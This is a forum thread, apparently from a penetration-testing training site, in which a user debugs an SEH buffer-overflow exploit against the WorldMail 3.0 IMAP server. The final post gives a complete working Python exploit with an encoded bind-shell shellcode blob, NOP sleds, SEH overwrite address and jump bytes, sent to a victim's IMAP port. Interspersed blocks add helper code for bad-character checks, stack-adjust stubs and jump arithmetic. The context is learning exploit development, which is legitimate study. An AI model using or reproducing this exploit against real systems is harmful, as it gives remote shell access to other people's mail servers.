Shellcode Executes but Cannot Connect to the Victim!

This topic contains 10 replies, has 6 voices, and was last updated by  zaixer 6 years, 4 months ago.

  • #8503
     zaixer 
    Participant

    Hi all,

    I am trying to exploit an SEH BoF in "Eudora Qualcomm WorldMail 3.0 (IMAPd)". The shellcode is bind_tcp on port 4444. Everything works fine: I removed all bad characters, verified that the code is placed at the right offset, and the code executes; I verify this by running "netstat -noa" on the victim machine, which shows that it is listening on port 4444 as expected.
    The problem arises when I try to connect to this port using netcat. Once I connect to the victim, the program crashes in the debugger, although it was "Running" without problems just before I connected to it.

    I even tried connecting to it from the victim machine itself to rule out any network problem; however, the same problem happens!

    Thanks in advance !

  • #53192
     hanyhasan 
    Participant

    Hi

    check this write up about worldmail 3.0
    http://www.bnxnet.com/2012/10/01/seh-worldmail-example/

  • #53193
     zaixer 
    Participant

    Thanks Hany,

    Actually, I have already reviewed it; however, I doubt that it is a working one, as the shellcode used contains bad chars like \x00!

  • #53194
     dynamik 
    Participant

    Can you paste your exploit? It’s difficult to provide much guidance without seeing it.

    Try doing a stack adjustment by subtracting something like -1500 from ESP before your shellcode. I’ve had the shellcode get corrupted as it decodes. It might get far enough to open a socket, but the rest is broken.
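    The two checks raised so far, the bad-character scan zaixer applied to the write-up's shellcode and the stack adjustment dynamik suggests here, can be made concrete. The block below is an added example and is not code from this thread; it assumes a 32-bit x86 target where ESP can be moved with `add esp, imm32`, that 0x00 is the only bad character (replace `badchars` with the set found for this IMAP command), and the ESP and payload addresses in `main` are made-up values for illustration, not addresses taken from the WorldMail crash.

```python
import struct


def find_badchars(buf, badchars):
    """Return (offset, value) for every forbidden byte found in buf."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def stack_adjust(nbytes, badchars=b"\x00"):
    """Encode `add esp, -nbytes` (81 C4 imm32) without forbidden bytes.

    `sub esp, 0x5DC` encodes as 81 EC DC 05 00 00 and carries null bytes, so the
    negative-immediate form is used instead. The exact distance is not critical:
    the point is only to move ESP well below the payload so that pushes, calls
    and the decoder's own stack writes no longer land on the shellcode. If the
    requested distance produces a bad byte, it is bumped until the encoding is clean.
    """
    for n in range(nbytes, nbytes + 256):
        stub = b"\x81\xc4" + struct.pack("<i", -n)
        if not find_badchars(stub, badchars):
            return stub, n
    raise ValueError("no clean encoding for add esp, -%d" % nbytes)


def prepend_stack_adjust(shellcode, nbytes=1500, badchars=b"\x00"):
    """Return stub + shellcode, refusing to emit a payload that still contains bad bytes."""
    stub, _ = stack_adjust(nbytes, badchars)
    payload = stub + shellcode
    hits = find_badchars(payload, badchars)
    if hits:
        raise ValueError("bad characters at offsets %r" % [i for i, _ in hits])
    return payload


def stack_overlaps_payload(esp, payload_addr, payload_len, stack_use):
    """True if stack writes in [esp - stack_use, esp) intersect the payload.

    stack_use is how many bytes below ESP the decoder and the shellcode's API
    calls are expected to consume; hypothetical numbers, read the real ones off
    the debugger at the crash.
    """
    lo, hi = esp - stack_use, esp
    return lo < payload_addr + payload_len and payload_addr < hi


if __name__ == "__main__":
    stub, n = stack_adjust(1500)
    print("add esp, -%d -> %s" % (n, stub.hex()))         # 81c424faffff

    # Constructed addresses: ESP sitting just above a 368-byte payload.
    esp, payload, length, use = 0x0012FF40, 0x0012FD00, 368, 256
    print("overlap before adjust:", stack_overlaps_payload(esp, payload, length, use))
    print("overlap after adjust: ", stack_overlaps_payload(esp - n, payload, length, use))
```

    Prepend the stub to the encoded shellcode (the stub runs first, so it must itself pass the bad-character check, which `prepend_stack_adjust` enforces) and re-run the exploit; if the crash on connect goes away, the stack was reaching into the payload.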

  • #53195
     the_hutch 
    Participant

    Don't know why people are asking for exploit code on this one. OP obviously has a working exploit if the payload was executed (as evidenced by the open port 4444). The problem is somewhere in the post-exploitation connection attempt.
    The only thing I can think of is possibly a firewall sitting between you and the remote system that is white-listed (so it drops all incoming connections to ports that are not in standard use on the network). Or a hardened host-based firewall, if the target is a Windows system.

  • #53196
     superkojiman 
    Participant

    Easy way to check if it's something else blocking the exploit: set up a netcat listener on port 4444 on your victim machine. Then try connecting to it with netcat on your attacking machine. If it gets dropped, then there's something sitting in between preventing it from connecting.

    If that works, then you need to examine the debugger closer. Do you know what’s causing it to crash? Maybe one of the functions being called when you attempt to connect is returning an error?

  • #53197
     hayabusa 
    Participant

    @the_hutch

    I think you over-read the intent in dynamik's response.

    (Note, the OP said the listener crashed on a connection attempt. Not that it just didn’t respond)

    The reason dynamik asked is because, very obviously, while the exploit opened the listener, it has issues with what to do with a connection attempt. I don’t think he’s actually asking for the code, specific to the exploit, itself, but rather the payload portion of the exploit, where the execution occurs ‘POST’ exploit. Obviously, either a.) the payload is flawed, or b.) something corrupted the payload, in memory (or it didn’t fit in memory), to the point where anything connecting to the listener causes it to crash, or c.) the payload code is making a call to a bad address.

    And I also agree with superkojiman, who posted, as I was typing… 😉

  • #53198
     the_hutch 
    Participant

    You’re right…my bad. Jumped the gun on that one…

  • #53199
     hayabusa 
    Participant

    @the_hutch wrote:

    You’re right…my bad. Jumped the gun on that one…

    No worries. I do it from time to time, too. (Much more often than I’d like to admit, sometimes.) It helps that many of us here have known dynamik (aka – ajohnson) for a couple of years now, so I pretty much knew where he was coming from (as well as recently having the privilege to meet him, face to face, for the first time – great guy)

  • #53200
     the_hutch 
    Participant

    Yeah….as the new guy around here, I should probably at least read the entire post before firing back replies and stepping on peoples toes, lol.

  • #53201
     zaixer 
    Participant

    @dynamik thanks for your response. For some reason it worked after adding some NOPs after the shellcode! Please check the code below:

    ====================================================================================================================
    import socket
    import sys

    # msf bind_tcp payload, LPORT=4444, encoded to avoid the bad characters
    shellcode = (b"\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
    b"\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
    b"\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
    b"\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
    b"\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
    b"\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
    b"\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
    b"\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
    b"\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
    b"\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
    b"\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
    b"\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
    b"\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
    b"\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
    b"\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
    b"\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
    b"\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
    b"\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
    b"\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
    b"\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
    b"\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
    b"\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
    b"\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
    b"\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
    b"\x05\x58\x64\x3d\x29\xcf\x85\x14")

    buffer = b"\x90" * 300                # NOP sled to fill the first 300 bytes before the shellcode
    buffer += shellcode                   # Shellcode to spawn a shell listening on port 4444
    buffer += b"\x90" * 81                # NOP sled to fill the rest of the buffer after the shellcode
    buffer += b"\xEB\x06\x90\x90"         # nSEH: short JMP of 6 bytes, over the handler address
    buffer += b"\x95\xcb\x0d\x60"         # SEH: address of a POP POP RETN sequence in module MsccMgr.dll (0x600dcb95)
    buffer += b"\x90" * 8 + b"\xe9\xff\xfc\xff\xff"  # 8 bytes of NOPs followed by a 769-byte backward jump (E9 rel32) into the NOP sled
    buffer += b"}" * 50                   # Junk

    if len(sys.argv) != 3:
        print("Usage: %s <victim IP> <IMAP port>" % sys.argv[0])
        sys.exit(1)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        s.connect((sys.argv[1], int(sys.argv[2])))
    except socket.error:
        print("Can't connect to server!\n")
        sys.exit(0)

    print("[+] Connecting to victim!")
    data = s.recv(1024)                   # IMAP banner
    print("[+] " + data.decode(errors="replace").rstrip())
    print("[+] Sending evil buffer...")
    s.send(b"A013 UID FETCH 4827313:4827313 " + buffer + b"\r\n")
    s.close()
    print("[+] Exploitation successful\n")
    print("[+] Please connect to port 4444 on the victim IP now!\n")
    ==================================================================================================================
    So when I move the 81 NOPs that are after the shellcode and place them before the shellcode (adding them to the 300 NOPs already there), the exploit fails!

    Actually, I would appreciate it if someone could let me know what is meant by stack adjustment!

    @superkojiman I am connecting to it from the local machine itself (nc 127.0.0.1 444) to avoid any network problems.
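    The layout in the post above can be checked arithmetically. The block below is an added example, not code from the thread: it takes the lengths from the posted script (300-byte sled, 81 bytes of padding, 4-byte nSEH, 4-byte handler, 8 NOPs, 5-byte `E9` jump) and a shellcode length of 368, which is the byte count of the posted blob, and computes where nSEH, the handler and the backward jump sit and where that jump lands, for both the posted layout and the variant with the 81 NOPs moved in front of the shellcode.

```python
import struct

# Lengths from the posted script; the shellcode length is the byte count of the
# posted blob (24 lines of 15 bytes plus a final line of 8).
SLED_BEFORE = 300
SHELLCODE_LEN = 368
PAD_AFTER = 81
NOPS_AFTER_SEH = 8
POSTED_LONG_JMP = b"\xe9\xff\xfc\xff\xff"


def seh_layout(sled_before, shellcode_len, pad_after, nops_after_seh=NOPS_AFTER_SEH):
    """Offsets (from the start of the buffer) of each piece of the SEH overwrite."""
    nseh = sled_before + shellcode_len + pad_after
    seh = nseh + 4
    return {
        "shellcode": sled_before,
        "nseh": nseh,                        # 4 bytes: EB 06 90 90
        "seh": seh,                          # 4 bytes: pop/pop/ret address
        "short_jmp_lands": nseh + 2 + 6,     # EB 06 is 2 bytes; rel8 counts from the next instruction
        "long_jmp": seh + 4 + nops_after_seh,
        "shellcode_to_nseh": pad_after,      # room between the end of the shellcode and the SEH record
    }


def encode_jmp_rel32(jmp_offset, target_offset):
    """E9 rel32 placed at jmp_offset and landing on target_offset.

    rel32 is measured from the end of the 5-byte instruction, not its start.
    """
    return b"\xe9" + struct.pack("<i", target_offset - (jmp_offset + 5))


def decode_jmp_rel32(jmp_bytes, jmp_offset):
    """Landing offset of an E9 rel32 jump located at jmp_offset."""
    if len(jmp_bytes) != 5 or jmp_bytes[0] != 0xE9:
        raise ValueError("not an E9 rel32 jump")
    return jmp_offset + 5 + struct.unpack("<i", jmp_bytes[1:])[0]


def landing_in_sled(layout, jmp_bytes, sled_before):
    """Where the long jump lands and whether that is inside the leading NOP sled."""
    target = decode_jmp_rel32(jmp_bytes, layout["long_jmp"])
    return target, 0 <= target < sled_before


if __name__ == "__main__":
    posted = seh_layout(SLED_BEFORE, SHELLCODE_LEN, PAD_AFTER)
    moved = seh_layout(SLED_BEFORE + PAD_AFTER, SHELLCODE_LEN, 0)  # the 81 NOPs moved in front
    for name, lay in (("posted", posted), ("NOPs moved before shellcode", moved)):
        target, ok = landing_in_sled(lay, POSTED_LONG_JMP, lay["shellcode"])
        print("%-28s %s" % (name, lay))
        print("    long jmp lands at offset %d (%s)" % (target, "in sled" if ok else "OUTSIDE sled"))
```

    In both layouts nSEH sits at offset 749, the handler at 753, the short jump lands at 757 (just past the handler address) and the `E9 FF FC FF FF` jump, which is a jump of -769 bytes rather than 700, lands at offset 1, inside the sled. So moving the padding changes nothing about where the crash transfers control; the only value that changes is `shellcode_to_nseh`, from 81 to 0, which is how far the end of the shellcode sits from the SEH record and the stack area below it. Whether stack writes actually reach that far is something only the debugger at the moment of the connect can show.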
